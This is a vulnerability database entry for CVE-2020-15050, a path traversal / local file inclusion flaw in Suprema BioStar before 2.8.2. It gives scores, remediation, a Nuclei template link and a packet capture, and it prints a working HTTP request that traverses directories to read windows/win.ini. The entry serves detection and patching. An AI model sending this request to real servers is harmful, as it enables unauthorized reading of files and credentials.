🔙 목록으로 돌아가기

CVE-2020-15050: Suprema BioStar <2.8.2 - Local File Inclusion

TitleSuprema BioStar <2.8.2 - Local File Inclusion
Authorgy741
SeverityHigh
ImpactAn attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.
RemediationUpgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability.
CVSS Score7.5
EPSS Score0.79206
CVE IDCVE-2020-15050
CWE IDCWE-22
Tags cve cve2020 suprema biostar2 packetstorm lfi supremainc vuln

🔍 Vulnerability Description

Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.

🌐 HTTP Request

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-15050.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-15050.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A